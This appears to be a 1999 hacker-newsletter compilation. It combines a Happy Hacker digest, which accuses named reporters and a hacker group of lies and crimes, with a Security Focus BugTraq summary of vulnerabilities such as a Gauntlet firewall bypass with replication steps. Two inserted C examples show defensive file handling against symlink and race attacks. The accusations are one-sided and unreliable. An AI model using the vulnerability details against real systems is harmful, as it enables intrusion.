      Looking for a free e-mail account?  Check out AntiOnline's
      Free Mail Service at
      http://www.AntiOnline.com/mail/
      -----------------------------------------------------------------
                      __ __                      __ __         __
                     / // /__ ____  ___  __ __  / // /__ _____/ /_____ ____
                    / _  / _ `/ _ \/ _ \/ // / / _  / _ `/ __/  '_/ -_) __/
                   /_//_/\_,_/ .__/ .__/\_, / /_//_/\_,_/\__/_/\_\\__/_/
                            /_/  /_/   /___/
      
      Inside Happy Hacker, Oct. 20, 1999
      _______________________________________________________________________
      
      Table of Contents
      
       * New York Times Exposes Smear Campaign against Vranesevich
       * The Stephen Glass Syndrome (reporters who write hacker stories that
         they know are false)
       * Where the heck have we been?
       * Call for editors
      
      
       ***  New York Times Exposes Smear Campaign against Vranesevich
      _______________________________________________________________________ 
      
      Just in case you are wondering whether the stories Sprenger, Koch, and
      Penenberg have written about Vranesevich could possibly have any substance,
      please read a recent article in the New York Times about him.  Reporter Matt
      Richtel actually interviewed the people involved instead of writing stories
      manufactured by Brian Martin and his imaginative crew at Attrition.org.  
      Following are some highlights of Richtel's report:
      http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html
      
      ...The new Vranesevich started to help government officials find people accused
      of malicious hacking. He said he turned over information to the FBI that led it
      to raid the home of a hacker named Brian Martin in connection with an attack on
      The New York Times' Web site in September 1998. 
      
      ...Martin, who admits to some malicious hacking in his past but says he has been
      an above-board security consultant for years, is a member of Attrition.org, a
      hacker group that has spearheaded an effort to discredit Vranesevich. ...The
      group also says that Vranesevich paid a hacker to break into the Web site of
      the United States Senate so that AntiOnline could be the first to report it --
      an accusation Vranesevich denies.
      
      Special Agent Jim Margolin of the FBI said the agency does not comment on
      whether it has investigated someone in the past. "But we continue to consult
      with Mr. Vranesevich, and that should say something about our assessment of his
      bona fides," he said. 
      
      ... his site continues to grow... Vranesevich runs it out of a rented three-room
      office space in Beaver, and said it gets "hundreds of thousands" of visitors
      each month. He has one full-time employee, paid and unpaid freelancers, and
      eight informers who keep him up to date on hacker activity. 
      
      Among the site's users are research firms who are putting faith in Vranesevich
      to help them understand computer security. For example, he is working with
      Klein Associates, a consulting firm near Dayton Ohio that advises companies on
      decision-making techniques. 

      So, folks, there you have it.  A respected reporter (Matt Richtel) from the
      world's most prestigious newspaper (The New York Times) actually researched his
      article.  He actually talked to the FBI instead of (as did Sprenger, Koch and
      Penenberg) trying to trick people into believing a malicious story about an FBI
      investigation concocted by criminal hacker suspect Martin.  I can hardly
      believe that Penenberg -- who exposed Stephen Glass -- would risk losing his
      career by going along with Martin's scheme to smear Vranesevich. 
      
      Could it possibly have something to do with the book Penenberg told me he is
      writing about hackers?  Could he and the other two reporters who have written
      stories invented by Martin possibly be vying to get exclusive rights to the
      story of the hacking spree of Hacking for Girliez/Loan Gunmen?  Nah, I'm
      probably just paranoid.
      
      Well, it's time to sign off and get back to playing with SuSE Linux.  I'm
      building a new Hacker Wargame box with SuSE, lady.happyhacker.org.  Meanwhile,
      Vranesevich is working on raising funding to pay someone to administer the
      Hacker Wargame full time so we can teach you serious computer security
      techniques in a fun environment.  I feel honored to know Vranesevich, and look
      forward to the day when the people running the smear campaign against him
      suffer the fate of Stephen Glass.  Oh, in case you were wondering, Glass has
      been studying to be a lawyer.
      
      
       *** The Stephen Glass Syndrome
      
      
      See http://www.forbes.com/columnists/penenberg/1999/0927.htm for the
      phony story against John
      Vranesevich that Penenberg recently wrote.  If you are a reporter, call me at
      505-281-9675 and I'll give you contact information for witnesses who can
      demonstrate that almost every item in Penenberg's story is false. 
      Specifically, Penenberg recycles every unfounded allegation made against
      Vranesevich that any reporter has ever been unethical enough to pick up from
      Martin's web site.  In private conversations with me, however, Penenberg has
      admitted he knows Martin has no credibility.  
      
      Penenberg was elevated to a senior editor of Forbes on the basis of his article
      "Lies, damn lies and fiction" in Forbes Digital Tool (May 11, 1998).   This
      broke the story behind "Hacker Heaven," an article in the New Republic by
      Stephen Glass.  Unfortunately the Forbes web site no longer carries Penenberg's
      article. However, the Columbia Journalism Review has an excellent story on the
      Glass hacker hoax at
      http://www.cjr.org/year/98/4/glass.asp. 
      Following is an excerpt:
      
      How a Writer Fooled His Readers
      
                    by Ann Reilly Dowd
                    Dowd, a free-lancer, is former Washington bureau chief of
                    Money and Fortune
          
      "We're going to Bethesda," Charles Lane, the editor of The New Republic, told
      Stephen Glass, the writer of a May 18 story, "Hack Heaven," that was being
      called factually challenged by reporters over at Forbes Digital Tool, the
      Forbes magazine Web site. And in Bethesda, Maryland, at the building where
      Glass had supposedly covered a computer-hackers' convention, Lane says his
      twenty-five-year-old star gave "the most detailed step-by-step account" of
      where he had sat, and with whom he had spoken. 
      
      It was only when Lane reminded him that the building's log and security videos
      would show who was actually there that day that Glass broke down and sobbed.
      Yes, he confessed, he had made up the conference. In truth, Lane says, the
      entire article had been created "out of whole cloth." So, it turns out, were
      others.
      
      Stephen Glass was a bright, prolific writer and prodigious reporter. He had a
      likable demeanor, an eye for detail, and an ear for language. He also had a
      fatal flaw -- a stunning lack of integrity...
      
      How was it possible that editors and checkers, who make their living as
      professional skeptics, got so snookered? When did it begin, and why?...
      
      Glass gamed the system, and brilliantly. He'd often submit stories late to the
      checkers so they were pressed for time. When they questioned his material, Lane
      says, Glass would provide forged faxes on fake letterheads of phony
      organizations, as well as fictitious notes, even voice mail or actual calls
      from people pretending to be sources. 
      
       *** Where the heck have we been?
      _______________________________________________________________________
      
      Yes, we're still alive!  Sorry for the long time not sending out mailings.  If
      you visit our web site from time to time, you'll see new features.  Actually,
      there's plenty of new material there.  Check it out!
      
      Also, we've had severe problems for almost two months with a bad T1 in our
      Amarillo operations.  So when you saw supposedly broken pictures or got a
      "connection reset by peer" message, that was just one after another technical
      screwup on the part of the backbone (Sprint, if you really want to know).  We
      are coping with that situation by mirroring the Happy Hacker web site on both
      the Antionline servers in Beaver, PA, while keeping another server up at SAGE,
      Inc.'s Amarillo site.  The SAGE server we are using is the recently released
      commercial version of their BRICKHouse server.  Its name is
      http://gabriel.happyhacker.org, 206.61.52.31. 
      Try to break into her -- please!  That's what beta testing is all about!  The
      other is, um, well, I'm not supposed to tell (oh, no, security by obscurity!). 
      But, hey, typing http://happyhacker.org or
      http://www.happyhacker.org will get you there
      unless you run into a DNS server that doesn't update too often.
      
      I (Carolyn Meinel) have also been busy working on our Hacker Wargame.  People
      who were persistent discovered three new computers on the Wargame in August and
      September.  No one got root, but I did preserve all files on
      meyer.happyhacker.org, an OpenBSD server.  When I put it back up (probably next
      week), the folks who figured out the ridiculous guest password and the few who
      got into guest2 using find and grep can get back into the game and play with
      those two "find" executables.  Someone forgot to compile in the "bash hide"
      option on one of them, tsk, tsk.
      
      In general, the concept of the wargame is to figure out what is happening there
      yourself.  If you have to ask me what computers are there and how to break in,
      you aren't ready yet to play the game.  The basic concept is to look for
      computers whose IP addresses resolve to something that ends with
      "happyhacker.org." 
      
      See the Happy Hacker bookstore
      (http://happyhacker.org/bookstore.html)
      for computer manuals that will help get you up to speed, and read our Guides
      and Digests.  Oh, yes, don't forget The Happy Hacker book.  
      
      Don't email me with questions!  Please!  I have reached email meltdown and
      mostly just delete everything nowadays.  Also, people who email me asking for
      help committing crime will discover that they are being immortalized at
      http://happyhacker.org/sucks.html.  
      
      I've also been working on a shell account server,
      http://shells.techbroker.com.  I had it on the
      Wargame for almost two months with two easy to crack accounts (one was user
      name test, password test).  The Tg0d gang got inside and was messing around and
      not getting root.  That made me feel good about the security, which was created
      by Satori and B-lips.  When it goes back up online in a few days, check it out
      for instructions on how to set up a home Windows 95/98 LAN and set up an
      Internet gateway so all your computers can access the Internet simultaneously
      through just one modem.  
      
      We will be selling shell accounts on shells.techbroker.com with tech support
      for people who want the power of a T1 for learning how to hack, and as a
      platform for competing in our Hacker Wargame.  Of course we will not allow
      shells.techbroker.com to be used as a platform to commit crime.
      
      Each Tuesday http://antionline.com posts a new "tip of
      the week" of mine.  If you want to find out how to get online with Linux really
      easily, even easier than Windows, check out the tip archives.  In a nutshell,
      the answer is, make sure your modem isn't a Winmodem, and install Caldera Linux
      (http://www.caldera.com). You can get an outstanding
      book on how to use Caldera at the Happy Hacker bookstore,
      http://happyhacker.org/bookstore.html.
      
      Also, I've been working on my next book, "Uberhacker: How to Break into
      Computers."  It will tell how to create Linux and WinNT attack computers, how
      to set up OpenBSD and Linux bastion computers, and how to set up a home hacker
      laboratory with many operating systems -- cheaply!  As usual, I have to test
      everything.  This keeps me rather busy.  Not only that, in order to be helpful
      to you who will read the book, I try everything on many different computers
      with many different operating systems, and do half a dozen installations of
      each operating system on several different hardware configurations.  Whew!
      
      I've finished working with Red Hat Linux.  Right now I am experimenting with
      SuSE Linux (http://www.suse.de), which comes with a totally
      awesome 5 gigs worth of programs, including many of great interest to hackers,
      such as nmap and SAINT.  I'm also still playing with Caldera, which is easier
      to install than Windows 98.  Next on my list are Debian Linux
      (http://www.debian.org) and Solaris
      (http://www.sun.com).
      
      
       *** Call for Editors
      
      
      
      We lost our Windows Digest editor Keydet89 because he objected to John
      Vranesevich donating his listserv services to us.  Keydet89 had several angry
      conversations with me in which he made it clear that he believes the
      allegations made against Vranesevich by Brian Martin's hacker gang, as seen at
      http://attrition.org.  Our Unix editor also quit.  As you
      saw in his last Digest, he was angry at Vranesevich for pointing out to Harvard
      University that the Packetstorm web site they were hosting contained a photo of
      his kid sister, her home address, and incitements to harm her.  Yes, I saw that
      material myself.  
      
      Harvard immediately took down the site, and made a statement to the media that
      the reason was attacks on an individual and pornography. Please give the
      Harvard administration credit for being decent human beings, folks.  And... I
      have no desire to work with anyone who would hate Vranesevich for protecting
      his kid sister. 
       
      I apologize to you who have subscribed to this mail list for not having done a
      better job of evaluating the character of two of the people who were our
      editors.  I was looking foremost for technical talent.  I failed to adequately
      consider the issue of values.  
      
      If anyone would like to take over the jobs of Windows editor and Unix editor,
      please phone me at 505-281-9675.  (Sorry, with there being way too much email,
      I usually just delete it unless it is from someone I know.)  This time around I
      will make sure that anyone who does volunteer work for us agrees that the
      attrition.org web site has serious ethical problems.  I mean, get real.  
      Attrition.org carries instructions for how to shoplift without getting caught
      and advocates murder, burglary, perjury and computer crime.  Common sense alone
      should tell anyone that its proprietors must also lie like rugs.
      
      If you applied before, please consider doing so again.  I apologize in advance
      for not choosing you, OK?
      
      These jobs pay nothing except the sense of satisfaction of helping people to
      learn about computers.  OK, the job also gives you something to put on your
      resume and gives you visibility in the computer security industry.  Also you
      can get into the inner circle of Happy Hacker and hang out with us terminal
      geeks.  Wowie!
      
      If you take the job, you will have to put up with people from Brian Martin's
      Attrition.org emailing and phoning you with fanciful, malicious stories.  If
      you do a good enough job, it is also possible that computer criminals will
      persuade their stable of credulous or unethical reporters (Polly Sprenger of
      Wired, Lew Koch of Cyberwire Dispatch, and Adam Penenberg of Forbes) into
      writing false and malicious stories about you, just as they have about
      Vranesevich. 
      
      So, if you are an ambitious masochist -- is this the perfect job, or what?
      _______________________________________________________________________
      To subscribe to the Happy Hacker Digest, email mailman@mailout.antionline.net
      with the message "subscribe happyhacker."  Unsubscribe with message
      unsubscribe happyhacker.
      
      This is a list devoted to *legal* hacking! If anyone plans to use any
      information in this Digest or at our Web site to commit crime, go away!  We
      like to put computer criminals behind bars where they belong!
      
      Hacker Wargame Director, Vincent Larsen <vincent@sage-inc.com>;
      Clown Princess: Carolyn Meinel <cmeinel@techbroker.com>
      
      Happy Hacker, Inc. is a 501 (c) (3) tax deductible organization
      _______________________________________________________________________
      
      
      
      @HWA  
      
93.0  Security Focus Newsletter
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Security Focus Newsletter 10 & 11
      Table of Contents:
      
      I.   INTRODUCTION
      II.  BUGTRAQ SUMMARY
      1. Hybrid Cablemodem Remote Configuration Vulnerability
      2. Microsoft IE5 IFRAME Vulnerability
      3. RedHat PAM NIS Locked Accounts Vulnerability
      4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities
      5. Jana Webserver Vulnerability
      6. Novell Client Denial of Service Vulnerability
      7. SCO OpenServer 5.0.5 'userOsa'  symlink Vulnerability
      8. SCO cancel Buffer Overflow Vulnerability
      9. RedHat lpr/lpd Vulnerabilities
      10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
      11. Gauntlet Firewall Rules Bypass Vulnerability
      12. Microsoft IE5 Javascript URL Redirection Vulnerability
      III. PATCH UPDATES
      1. Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
      2. Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities
      3. Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
      4. Vulnerability Patched: Novell Client Denial of Service Vulnerability
      5. Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
      6. Vulnerability Patched: Referer Tag Vulnerability (Roxen Webserver)
      7. Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
      8. Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
      9. Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
      10. Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability
      11. Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
      12. Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
      13. Vulnerability Patched: Linux mirror Vulnerability (Debian)
      14. Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
      15. Vulnerability Patched: Multiple Linux Vendor PAM NIS Locked Accounts Vulnerability
      IV.  INCIDENTS SUMMARY
      1. Interesting scans in the past few days (Thread)
      2. Random malfunction or hack?
      3. Notifying possibly compromised sites & SANS 99 (Thread)
      4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
      5. Log sharing
      6. Attack methodology
      7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
      8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
      9. Intrusion Detection rfc draft
      10. directed broadcasts to UDP ports 41508, 41524, 41530
      V. VULN-DEV RESEARCH LIST SUMMARY
      1. Re: Guestbook perl script (error fix - Thread)
      2. The PcWeek crack
      3. Re: Cisco IOS password types overview. (Thread)
      4. Timbuktu32 (Thread)
      5. Re: solaris DoS (fwd)
      6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
      7. Newbie in Jeopardy
      8. Window manager - implementation bug/feature ??? (Thread)
      9. fbsd 3.3 ospf_monitor research (Thread)
      10. SSH and X11 forwarding
      11. NT SysKey should be breakable (Thread)
      12. 2 dodgy network programs
      13. Free BSD 2.2.x listen() problem / FTP exploit
      14. Classes? (Thread)
      15. possible gnome remote overflow
      VI.   SECURITY JOBS
         Discussion: 
      1. yet another question about entering the security field (Thread)
         Seeking Position:
      1. Contact: I am looking for a good company to work for NYC - Edward Saxon, <ed_saxon@hotmail.com>
      2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com
         Seeking Staff:
      1. Unix/Network/Security Engineer - NYC
      2. Developer needed - San Mateo - California
      3. Unix/Network Security Engineer Needed In Maryland
      4. Domain Expert / Security Development / IT / Logistics #123
      5. Security Verification Analyst #123
      6. looking for information security manager....
      7. Job opportunities in San Jose
      8. 3com Job Posting
      1. Perl Programmer/System Administrator - NYC
      2. Wirex: Linux Systems Administrator, Portland, Oregon
      3. 10+ positions in the Bay Area, LA
      4. Security Engineers in Waltham, MA
      VII.  SECURITY SURVEY RESULTS
      VIII. SECURITY FOCUS EVENTS
      1. New Scoring and Comments under Tools, Products, Library and Links
      2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      IX. SECURITY FOCUS TOP 6 TOOLS
      1. UCGI Vulnerability Scanner 1.56 (Windows & Unix)
      2. NTInfoScan (NT)
      3. SuperScan 2.0.4 (NT)
      4. PacketX (NT)
      5. Achtung (NT)
      6. Custom Attack Scripting Language (NT & Unix)
      X. SPONSOR INFORMATION - Tripwire Security
      
      I.   INTRODUCTION
      -----------------
      
      Welcome to the Security Focus 'week in review' newsletter issue 10 & 11.
      We apologize for combining two weeks in a row. We have been working
      furiously on building infrastructure here at Security Focus. One of the
      results of this is that now you can rate and comment on essentially every
      item, product, paper and vendor on our site. Hopefully this new rating
      system will, over time, create an excellent community resource.
      
      
      II.  BUGTRAQ SUMMARY 1999-10-04 to 1999-10-19
      ---------------------------------------------
      
      1. Hybrid Cablemodem Remote Configuration Vulnerability
      BugTraq ID: 695
      Remote: Yes
      Date Published: 1999-10-05
      Relevant URL:
      http://www.securityfocus.com/bid/695
      Summary:
      
      Hybrid Network's cable modems are vulnerable to several different types of
      attack due to a lack of authentication for the remote
      administration/configuration system. The cable modems use a protocol
      called HSMP, which uses UDP as its transport layer protocol. This makes it
      trivial to spoof packets and possible for hackers to compromise
      cable-modem subscribers anonymously. The possible consequences of this
      problem being exploited are very serious and range from denial of service
      attacks to running arbitrary code on the modem.
      
      2. Microsoft IE5 IFRAME Vulnerability
      BugTraq ID: 696
      Remote: Yes
      Date Published: 1999-10-11
      Relevant URL:
      http://www.securityfocus.com/bid/696
      Summary:
      
      Internet Explorer 5 will allow a malicious web page to read the contents
      of local files through a weakness in the IE5 security model. Normally the
      document.execCommand method is restricted from reading and returning data
      on the local machine, however if the method is called from within an
      IFRAME this restriction can be circumvented.
      
      3. RedHat PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Remote: No
      Date Published: 1999-10-13
      Relevant URL:
      http://www.securityfocus.com/bid/697
      Summary:
      
      Under some network configurations it may be possible to access locked NIS
      accounts due to a vulnerability in the PAM authentication modules shipped
      with RedHat version 6.1. This can lead to a local compromise where the
      password is known for a locked account. RedHat 6.1 for Intel platforms is
      the only vulnerable version.
      
      4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities
      BugTraq ID: 698
      Remote: Yes
      Date Published: 1999-10-09
      Relevant URL:
      http://www.securityfocus.com/bid/698
      Summary:
      
      Versions 1.5 and earlier of the WebTrends Enterprise Reporting Server
      contain a series of vulnerabilities. The vulnerabilities in question are:

      1. Logging via the server will write to a world-writable file.
      
      Under certain conditions this file may contain certain sensitive
      information such as usernames and passwords, in clear text. This in
      particular is known to occur if you are not running using PAM (Pluggable
      Authentication Module).
      
      If the server is running without PAM, users must use the server provided
      interface to create new users and set their passwords. In this case, by
      default, everything (including username and password) is stored in clear
      text in the file "interface.log" with read/write permissions for user,
      group and other. Any local user can read that file. If a WebTrends user
      also has a shell account on the box with the same password, that account
      can be compromised.
      
      2. The server stores its user information in files with world read/write permissions.

      All user information is stored in the directory "wtm_wtx/datfiles/users"
      in the format "username.usr". Those files have owner/group/other
      read/write permissions. Any local user can decrypt the password or, even
      easier, alter or delete the user file and thereby create a denial of
      service.
      
      3.  User profiles are stored in world readable, writable files.
      
      By altering these files it may be possible to launch a denial of service
      attack. As with the user files all profile information is stored in
      "wtm_wtx/datfiles/profiles" with owner/group/other read/write permissions.
      Any local user can alter/delete the profile file and therefore create a
      denial of service.
      
      4. Under default installations, a blank username and password is enabled.
      
      This will allow remote users to access the server with administration
      privileges to the software if the owner neglects to change this.
      
      
      5. Jana Webserver Vulnerability
      BugTraq ID: 699
      Remote: Yes
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/699
      Summary:
      
      The Jana webserver is remotely vulnerable to an attack which can allow
      hackers to view files outside of the root httpd directory. See the bugtraq
      posting linked to from the references section of this vdb entry for more
      information. We have not been able to locate the maintainer of this
      product (The Jana webserver). If anyone has any information about who to
      contact for information regarding this issue, please contact
      vuldb@securityfocus.com.
      
      6. Novell Client Denial of Service Vulnerability
      BugTraq ID: 700
      Remote: Yes
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/700
      Summary:
      
      Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable
      to a remotely exploitable vulnerability which could cause a denial of
      service. The client opens a listening TCP socket on port 427; if a SYN
      is sent to that port, the machine locks up with a "blue screen" error.
      The only solution from that point is to reset the affected computer.
      
      7. SCO OpenServer 5.0.5 'userOsa'  symlink Vulnerability
      BugTraq ID: 701
      Remote: No
      Date Published: 1999-10-11
      Relevant URL:
      http://www.securityfocus.com/bid/701
      Summary:
      
      Under certain versions of SCO OpenServer there exists a symlink
      vulnerability which can be exploited to overwrite any file which is group
      writable by the 'auth' group. The problem in particular is in the
      /etc/sysadm.d/bin/userOsa executable. When given garbage output the
      program will write out a debug log. However, the program does not check
      whether it is overwriting an existing file nor whether it is following
      a symlink. Therefore it is possible to overwrite files with debug data
      which are both in the 'auth' group and are writable by the same group.
      Both /etc/shadow & /etc/passwd fall into this category. If such an attack
      were launched against these files the system would be rendered unusable.
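
      The missing check described above, shown as an added example (not code
      from the newsletter or from SCO): a debug-log writer that follows a
      planted symlink next to one that refuses to. All function names, file
      names and contents are hypothetical and constructed for the illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the summary describes: the log path is opened without checking
 * whether it already exists or is a symlink, so the write lands on whatever
 * file the link points to. */
int write_log_unsafe(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n == (ssize_t)strlen(msg) ? 0 : -1;
}

/* Hardened form: O_EXCL makes open() fail with EEXIST if the name already
 * exists (a symlink counts as existing), O_NOFOLLOW refuses a symlink as the
 * last path component, and fstat() confirms that the descriptor refers to a
 * regular file with a single link before anything is written. */
int write_log_safe(const char *path, const char *msg)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n == (ssize_t)strlen(msg) ? 0 : -1;
}

/* Constructed scenario inside a private temporary directory: "protected"
 * stands in for a group-writable system file and "debug.log" is a symlink
 * planted at the path the program logs to.
 * Returns 1 if the protected file is intact afterwards, 0 if it was
 * overwritten, -1 if the scenario could not be set up. */
int protected_file_survives(int use_safe)
{
    static const char original[] = "constructed-sample-content\n";
    char dir[] = "/tmp/logdemoXXXXXX";
    char target[64], logpath[64], buf[64];
    int survived = -1;
    FILE *f;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(logpath, sizeof logpath, "%s/debug.log", dir);

    f = fopen(target, "w");
    if (f != NULL) {
        fputs(original, f);
        fclose(f);
        if (symlink(target, logpath) == 0) {
            if (use_safe)
                write_log_safe(logpath, "debug: bad input\n");
            else
                write_log_unsafe(logpath, "debug: bad input\n");
            f = fopen(target, "r");
            if (f != NULL) {
                size_t n = fread(buf, 1, sizeof buf - 1, f);
                fclose(f);
                buf[n] = '\0';
                survived = (strcmp(buf, original) == 0);
            }
        }
    }
    unlink(logpath);
    unlink(target);
    rmdir(dir);
    return survived;
}

int main(void)
{
    printf("unsafe writer: protected file %s\n",
           protected_file_survives(0) == 1 ? "intact" : "overwritten");
    printf("safe writer:   protected file %s\n",
           protected_file_survives(1) == 1 ? "intact" : "overwritten");
    return 0;
}
```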
      
      
      8. SCO cancel Buffer Overflow Vulnerability
      BugTraq ID: 702
      Remote: No
      Date Published: 1999-10-08
      Relevant URL:
      http://www.securityfocus.com/bid/702
      Summary:
      
      There is a buffer overflow vulnerability in
      /opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel. It is important to
      know that the overflows are not in "/usr/bin/cancel" or
      "/usr/lpd/remote/cancel". The consequence of this vulnerability being
      exploited is compromise of effective groupid of group lp.
      
      9. RedHat lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Remote: No
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/718
      Summary:
      
      The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain
      vulnerabilities which may allow printing of files for which read access is
      not allowed. The first of the two problems is a race condition that can be
      exploited between the access checking and the opening of the file. The
      second is a symlink attack that could also be used to print files that
      normally cannot be read by a regular user (through lpr -s).
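
      Both lpr problems come from deciding on a path name and then opening it
      later. The following added example (not Red Hat's patch and not code from
      the newsletter) opens the file first and makes every decision on the
      descriptor; open_for_user, the file names and the second "user" are
      hypothetical, and supplementary groups and ACLs are not consulted.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open `path` for reading on behalf of user (uid, gid) from a privileged
 * process. access(path) followed by open(path) leaves a window in which the
 * name can be re-pointed at another file; here the file is opened first and
 * the permission decision is made with fstat() on the object actually opened.
 * Returns a descriptor, or -1 if the request is refused. */
int open_for_user(const char *path, uid_t uid, gid_t gid)
{
    struct stat st;
    mode_t need;
    /* O_NOFOLLOW: refuse a symlink as the final component (the "lpr -s" case).
     * O_NONBLOCK: do not hang if the name turns out to be a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    /* Pick the permission class that applies to the requesting user. */
    if (st.st_uid == uid)
        need = S_IRUSR;
    else if (st.st_gid == gid)
        need = S_IRGRP;
    else
        need = S_IROTH;
    if ((st.st_mode & need) == 0) {
        close(fd);
        return -1;
    }
    return fd;   /* all later reads must use this descriptor, not the path */
}

/* Constructed scenario in a private temporary directory. Returns a bitmask:
 *   1  owner may read a mode-0600 file
 *   2  a different uid/gid is refused on the same file
 *   4  a symlink to the file is refused even for the owner
 *   8  the different uid/gid is accepted once the file is mode 0644
 * or -1 if the scenario could not be set up. */
int spool_access_demo(void)
{
    char dir[] = "/tmp/spooldemoXXXXXX";
    char file[64], linkpath[64];
    struct stat st;
    int fd, r, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(file, sizeof file, "%s/private.txt", dir);
    snprintf(linkpath, sizeof linkpath, "%s/job", dir);

    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 && fchmod(fd, 0600) == 0 && fstat(fd, &st) == 0 &&
        symlink(file, linkpath) == 0) {
        uid_t other_uid = st.st_uid + 1;   /* constructed second user */
        gid_t other_gid = st.st_gid + 1;

        if ((r = open_for_user(file, st.st_uid, st.st_gid)) >= 0) {
            result |= 1;
            close(r);
        }
        if ((r = open_for_user(file, other_uid, other_gid)) < 0)
            result |= 2;
        else
            close(r);
        if ((r = open_for_user(linkpath, st.st_uid, st.st_gid)) < 0)
            result |= 4;
        else
            close(r);
        if (chmod(file, 0644) == 0 &&
            (r = open_for_user(file, other_uid, other_gid)) >= 0) {
            result |= 8;
            close(r);
        }
    }
    if (fd >= 0)
        close(fd);
    unlink(linkpath);
    unlink(file);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("checks passed (bitmask): %d\n", spool_access_demo());
    return 0;
}
```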
      
      10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
      BugTraq ID: 720
      Remote: Yes
      Date Published: 1999-10-15
      Relevant URL:
      http://www.securityfocus.com/bid/720
      Summary:
      
      Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a
      remotely exploitable buffer overflow attack. The problem is in their web
      configuration utility, and is the result of an unchecked strcpy() call.
      The consequence is the execution of arbitrary code on the target host
      (running the configuration utility) with the privileges of the web
      software.
      
      11. Gauntlet Firewall Rules Bypass Vulnerability
      BugTraq ID: 721
      Remote: Yes
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/721
      Summary:
      
      It may be possible to violate all firewall rules if certain conditions are
      met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
      specific configuration.  The following things need to happen in the order
      listed below for Gauntlet to be exploitable:
      
       1) Install BSDI 3.1
      
       2) Install Gauntlet 5.0
      
       3) Install BSDI patch M310-049
      
       4) Install Gauntlet 5.0 kernel patch level 2
      
       5) Remove any proxy settings on client machine.
      
       6) Set the default route on the client machine and attempt to connect to
          any host through a normal tcp connection.
      
      This problem surfaces when connections are made through any adaptive
      proxy, "old" proxy or no proxy at all.  In order to exploit this, a route
      will need to be specified since NAT will not occur when data is sent
      through the affected firewall.
      
      None of the connections that ignore the rules are logged in
      /var/log/messages.
      
      Keith Young describes how to replicate the problem (this is taken directly
      from his bugtraq post):
      
      
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root.
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal interfaces. If necessary, configure ESPM hosts, DNS settings, and admin
      users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9)  Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required for M310-049 installation, download both from
      
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
      
              File info:
              M310-046        1194 Kb    Wed Oct 14 00:00:00 1998
              M310-049        116 Kb     Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
      
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
